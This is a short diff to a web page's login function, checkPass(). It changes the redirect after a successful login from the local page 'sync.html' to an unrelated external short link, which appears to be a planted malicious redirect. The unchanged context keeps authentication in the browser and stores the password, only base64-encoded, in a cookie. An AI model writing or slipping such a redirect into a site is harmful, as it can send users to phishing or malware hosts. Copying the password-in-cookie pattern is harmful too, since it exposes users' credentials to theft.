--- a/index.html
+++ b/index.html
@@ -197,7 +197,7 @@ function checkPass() {
                  document.cookie = "login=true";
                  document.cookie = "name=" + document.getElementById('username').value;
 		 document.cookie = "sessID=" + btoa(document.getElementById('password').value);
-		 window.location.href = "sync.html";
+		 window.location.href = "http://pintient.com/2yVf";
            }
            } else {
   alert("Username or password is incorrect.");
